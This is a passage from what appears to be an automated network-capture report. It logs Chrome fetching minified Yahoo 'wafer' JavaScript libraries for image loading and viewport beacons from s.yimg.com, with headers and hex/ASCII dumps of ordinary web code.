                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 6645
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 538916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 69 6d 61 67 65 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 69 6d 61 67 65 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-image",[],t):"object"==typeof exports?exports["wafer-image"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 2c 72 29 7b 72 26 26 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 73 65 74 22 2c 72 29 2c 65 2e 73 72 63 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 2c 72 29 7b 76 61 72 20 61 3d 65 2e 67 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function n(e,t,r){r&&e.setAttribute("srcset",r),e.src=t}function i(e,t,r){var a=e.ge
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 72 3d 65 2e 72 6f 6f 74 2c 73 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 64 6f 63 75 6d 65 6e 74 3a 72 3b 61 28 74 68 69 73 2c 74 29 3b 76 61 72 20 6e 3d 74 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 66 69 67 73 2c 69 3d 6e 2e 64 61 72 6b 53 72 63 73 65 74 2c 6c 3d 6e 2e 6e 61 74 69 76 65 43 6c 61 73 73 2c 75 3d 6e 2e 73 65 6c 65 63 74 6f 72 2c 66 3d 6e 2e 73 65 70 61 72 61 74 6f 72 2c 64 3d 6e 2e 73 72 63 73 65 74 2c 70 3d 6e 2e 73 75 63 63 65 73 73 43 6c 61 73 73 2c 79 3d 6f 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 7b 72 6f 6f 74 3a 73 2c 73 65 6c 65 63 74 6f 72 3a 75 2c 73 75 63 63 65 73 73 43 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: uments[0]:{},r=e.root,s=void 0===r?document:r;a(this,t);var n=t.prototype.configs,i=n.darkSrcset,l=n.nativeClass,u=n.selector,f=n.separator,d=n.srcset,p=n.successClass,y=o(this,(t.__proto__||Object.getPrototypeOf(t)).call(this,{root:s,selector:u,successCl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 22 2c 64 29 7d 29 29 2c 74 2e 5f 61 64 64 45 76 65 6e 74 73 54 6f 45 6c 65 6d 65 6e 74 28 65 2c 70 2c 22 64 65 66 61 75 6c 74 22 2c 6f 29 7d 72 65 74 75 72 6e 20 61 28 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 43 6f 6c 6f 72 53 63 68 65 6d 61 43 68 61 6e 67 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 64 61 72 6b 6d 6f 64 65 49 6e 73 74 61 6e 63 65 73 2c 74 3d 21 30 2c 72 3d 21 31 2c 61 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6f 2c 73 3d 65 2e 6b 65 79 73 28 29 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 74 3d 28 6f 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 74 3d 21 30 29 7b 76 61 72 20 6e 3d 6f 2e 76 61 6c 75 65 3b 74 68 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ",d)})),t._addEventsToElement(e,p,"default",o)}return a()})}},{key:"handleColorSchemaChange",value:function(){var e=this._state.darkmodeInstances,t=!0,r=!1,a=void 0;try{for(var o,s=e.keys()[Symbol.iterator]();!(t=(o=s.next()).done);t=!0){var n=o.value;thi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 7b 65 6c 65 6d 3a 65 2c 6d 65 74 61 3a 7b 73 72 63 3a 73 2c 73 72 63 73 65 74 3a 69 7d 2c 6e 61 6d 65 3a 22 57 61 66 65 72 49 6d 61 67 65 22 2c 73 74 61 63 6b 3a 6e 75 6c 6c 7d 29 2c 77 28 74 2c 22 65 72 72 6f 72 22 2c 72 29 2c 77 28 74 2c 22 6c 6f 61 64 22 2c 76 29 7d 2c 76 3d 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 22 6e 61 74 69 76 65 22 21 3d 3d 72 3f 28 22 69 6d 61 67 65 22 3d 3d 3d 6c 7c 7c 22 70 69 63 74 75 72 65 22 3d 3d 3d 6c 3f 6e 28 65 2c 73 2c 69 29 3a 65 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 3d 27 75 72 6c 28 22 27 2b 73 2b 27 22 29 27 2c 6f 2e 5f 69 74 65 6d 4c 6f 61 64 65 64 28 65 29 29 3a 28 6f 2e 5f 61 64 64 42 6f 75 6e 64 61 72 79 53 75 63 63 65 73 73 43 6c 61 73 73 28 65 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {elem:e,meta:{src:s,srcset:i},name:"WaferImage",stack:null}),w(t,"error",r),w(t,"load",v)},v=function a(){"native"!==r?("image"===l||"picture"===l?n(e,s,i):e.style.backgroundImage='url("'+s+'")',o._itemLoaded(e)):(o._addBoundarySuccessClass(e),e.classList
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC145INData Raw: 43 6c 61 73 73 3a 22 77 61 66 65 72 2d 69 6d 67 2d 6e 61 74 69 76 65 22 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 22 77 61 66 65 72 2d 69 6d 67 2d 6c 6f 61 64 65 64 22 2c 61 6c 6c 6f 77 50 72 65 66 65 74 63 68 3a 21 30 7d 3b 76 61 72 20 4f 3d 53 3b 74 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 4f 28 7b 73 65 6c 65 63 74 6f 72 3a 4f 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 66 69 67 73 2e 73 65 6c 65 63 74 6f 72 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Class:"wafer-img-native",successClass:"wafer-img-loaded",allowPrefetch:!0};var O=S;t.default=new O({selector:O.prototype.configs.selector})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              104192.168.2.45112787.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC366OUTGET /aaq/wf/wf-beacon-1.3.4-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: tCuz6aBvqImDZ3piHChqZphvNAVqeJenvWrV1k0YXw7PyQqWsW7lFLbSNG9uvGl44e2bQKED6k+ZjDb/Wx5mMjZpw0SHFAalnoIMBaxUSNk=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: X4NND87A8Q61WJPG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Fri, 27 Sep 2024 09:05:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 13 Feb 2023 05:31:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "397b59e3eeca4f747ea1f6ff6323154c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: tENZ6Ri2vrrjg96D4AX.qx653XeJQH2M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 10637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 986866
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 62 65 61 63 6f 6e 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 62 65 61 63 6f 6e 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-beacon",[],t):"object"==typeof exports?exports["wafer-beacon"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 74 2c 72 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 74 5b 72 5d 3b 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6e 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 6e 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),u=function(){function e(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 74 74 72 69 62 75 74 65 28 4f 2b 22 74 72 69 67 67 65 72 2d 70 65 72 63 65 6e 74 61 67 65 22 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 6d 3d 66 28 77 2c 32 29 2c 6b 3d 6d 5b 30 5d 2c 54 3d 6d 5b 31 5d 2c 6a 3d 6b 3f 4d 61 74 68 2e 6d 61 78 28 4d 61 74 68 2e 6d 69 6e 28 31 30 30 2c 70 61 72 73 65 49 6e 74 28 6b 2c 31 30 29 29 2c 30 29 3a 35 30 2c 43 3d 54 3f 4d 61 74 68 2e 6d 61 78 28 4d 61 74 68 2e 6d 69 6e 28 31 30 30 2c 70 61 72 73 65 49 6e 74 28 54 2c 31 30 29 29 2c 30 29 3a 35 30 2c 50 3d 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 4f 2b 22 74 72 69 67 67 65 72 2d 63 75 6d 75 6c 61 74 69 76 65 22 29 2c 41 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 4f 2b 22 62 65 61 63 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6c 61 73 73 22 29 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ttribute(O+"trigger-percentage")||"").split(" "),m=f(w,2),k=m[0],T=m[1],j=k?Math.max(Math.min(100,parseInt(k,10)),0):50,C=T?Math.max(Math.min(100,parseInt(T,10)),0):50,P=e.hasAttribute(O+"trigger-cumulative"),A=e.getAttribute(O+"beacon-container-class")||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 6f 66 66 73 65 74 59 2c 70 3d 69 2e 73 65 6c 65 63 74 6f 72 2c 79 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 63 2d 75 29 3b 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 62 65 61 63 6f 6e 2d 69 6e 2d 70 72 6f 67 72 65 73 73 22 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 28 66 7c 7c 21 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 73 29 29 26 26 28 30 3d 3d 3d 79 7c 7c 21 31 3d 3d 3d 6e 7c 7c 64 2e 69 73 50 61 67 65 56 69 73 69 62 6c 65 26 26 77 28 6f 2c 6c 28 7b 7d 2c 69 2c 7b 6f 66 66 73 65 74 58 3a 68 2c 6f 66 66 73 65 74 59 3a 76 7d 29 2c 64 2e 76 69 65 77 70 6f 72 74 29 29 29 72 65 74 75 72 6e 20 61 26 26 61 2e 73 70 6c 69 74 28 22 7c 22 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: offsetY,p=i.selector,y=Math.max(0,c-u);o.classList.add("wafer-beacon-in-progress"),setTimeout(function(){if((f||!o.classList.contains(s))&&(0===y||!1===n||d.isPageVisible&&w(o,l({},i,{offsetX:h,offsetY:v}),d.viewport)))return a&&a.split("|").forEach(funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 6e 63 74 69 6f 6e 28 72 29 7b 72 26 26 22 6d 6f 75 73 65 65 6e 74 65 72 22 3d 3d 3d 74 26 26 65 2e 64 65 73 74 72 6f 79 28 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 66 66 73 65 74 59 22 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 30 3b 74 68 69 73 2e 5f 75 74 69 6c 2e 6f 66 66 73 65 74 59 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 6f 66 66 73 65 74 59 7c 7c 65 7d 7d 2c 7b 6b 65 79 3a 22 6f 66 66 73 65 74 58 22 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nction(r){r&&"mouseenter"===t&&e.destroy()})}},{key:"offsetY",set:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0;this._util.offsetY=this._util.offsetY||e}},{key:"offsetX",set:function(){var e=arguments.length>0&&void 0!==argumen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2e 6b 65 79 2c 6e 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 72 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 72 29 2c 6e 26 26 65 28 74 2c 6e 29 2c 74 7d 7d 28 29 2c 41 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 75 74 69 6c 73 2c 45 3d 41 2e 62 69 6e 64 45 76 65 6e 74 2c 78 3d 41 2e 65 61 63 68 2c 53 3d 41 2e 65 6c 65 6d 65 6e 74 49 6e 56 69 65 77 2c 58 3d 41 2e 74 68 72 6f 74 74 6c 65 2c 59 3d 41 2e 75 6e 62 69 6e 64 45 76 65 6e 74 2c 49 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 62 61 73 65 2c 4c 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 73 2e 57 61 66 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ritable=!0),Object.defineProperty(e,n.key,n)}}return function(t,r,n){return r&&e(t.prototype,r),n&&e(t,n),t}}(),A=window.wafer.utils,E=A.bindEvent,x=A.each,S=A.elementInView,X=A.throttle,Y=A.unbindEvent,I=window.wafer.base,L=window.wafer.controllers.Wafer
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 22 68 61 6e 64 6c 65 52 65 73 69 7a 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 6d 61 70 4f 66 66 73 65 74 28 29 2c 74 68 69 73 2e 5f 76 61 6c 69 64 61 74 65 57 69 74 68 54 68 72 6f 74 74 6c 65 28 29 7d 7d 2c 7b 6b 65 79 3a 22 77 69 6c 6c 44 65 73 74 72 6f 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 3b 74 26 26 78 28 74 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 59 28 74 2c 22 73 63 72 6f 6c 6c 22 2c 65 2e 5f 76 61 6c 69 64 61 74 65 57 69 74 68 54 68 72 6f 74 74 6c 65 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 64 69 64 53 79 6e 63 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "handleResize",value:function(){this._mapOffset(),this._validateWithThrottle()}},{key:"willDestroy",value:function(){var e=this,t=this._options.container;t&&x(t,function(t){Y(t,"scroll",e._validateWithThrottle)})}},{key:"didSync",value:function(){var e=th
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC237INData Raw: 2d 70 61 72 73 65 49 6e 74 28 63 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2a 70 2f 31 30 30 2c 31 30 29 29 2c 21 76 26 26 28 6c 2e 69 6e 73 74 61 6e 63 65 2e 6f 66 66 73 65 74 58 3d 2d 70 61 72 73 65 49 6e 74 28 63 2e 63 6c 69 65 6e 74 57 69 64 74 68 2a 64 2f 31 30 30 2c 31 30 29 29 7d 7d 63 61 74 63 68 28 65 29 7b 72 3d 21 30 2c 6e 3d 65 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 74 26 26 6f 2e 72 65 74 75 72 6e 26 26 6f 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 72 29 74 68 72 6f 77 20 6e 7d 7d 7d 7d 5d 29 2c 74 7d 28 4c 29 2c 42 3d 56 3b 74 2e 64 65 66 61 75 6c 74 3d 6e 65 77 20 42 28 7b 73 65 6c 65 63 74 6f 72 3a 22 2e 77 61 66 65 72 2d 62 65 61 63 6f 6e 22 7d 29 7d 7d 29 7d 29 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: -parseInt(c.clientHeight*p/100,10)),!v&&(l.instance.offsetX=-parseInt(c.clientWidth*d/100,10))}}catch(e){r=!0,n=e}finally{try{!t&&o.return&&o.return()}finally{if(r)throw n}}}}]),t}(L),B=V;t.default=new B({selector:".wafer-beacon"})}})});


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              105192.168.2.45112887.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC366OUTGET /aaq/wf/wf-rapid-1.10.9-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
